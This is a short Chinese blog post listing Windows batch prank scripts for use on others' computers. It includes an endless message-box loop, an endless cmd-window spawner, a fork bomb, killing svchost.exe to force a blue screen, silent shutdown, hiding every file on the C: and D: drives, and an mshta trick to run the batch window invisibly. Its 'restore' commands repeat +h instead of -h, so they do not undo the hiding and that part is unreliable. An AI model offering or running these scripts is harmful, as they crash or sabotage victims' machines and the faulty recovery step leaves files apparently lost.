Bat
\(Bat\)
不要乱用,也不要说是我教的
在自己电脑上也不要尝试,标 \(\red 危\) 的慎用
\(Max\) \(Message\)
:A
@echo off
echo msgbox"你想弹出的东西">chome.vbs
chome.vbs
del chome.vbs
goto A
\(Max\) \(Cmd\)
start cmd
%0
\(BooM\) \(\red 危\)
%0|%0
\(blue\) \(screen\) \(\red 危\)
taskkill -s -im svchost.exe
\(Shutdown\)
1.\(Direct\) \(Shutdown\)
shutdown -p
2.\(Delayed\) \(Shutdown\)(有弹窗提示容易暴露)
shutdown -s -t 秒数(不加默认为30)
3.\(Rescue\)
shutdown -a
想具体了解\(shutdown\)可以打shutdown -?
(帮助)
\(Hide\)
隐藏D盘所有文件
attrib +h /s /d d:\*.*
隐藏C盘所有文件
attrib +h /s /d c:\*.*
恢复
attrib +h /s /d d:\*.*
attrib +h /s /d c:\*.*
添加磁盘(以X为例)
subst x: c:\windows
恢复
for %%i in (a b c d e f g h i j k l m n o p q r s t u v w x y z) do attrib %%i -h&rd %%i&subst %%i: /d
辅助
\(Hide\) \(The\) \(Cmd\) \(Window\) \(When\) \(You\) \(Run\) \(Bat\)
@echo off
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
如果你有更好的请私信我
本文来自博客园,作者:whrwlx,转载请注明原文链接:https://www.cnblogs.com/whrwlx/p/18064350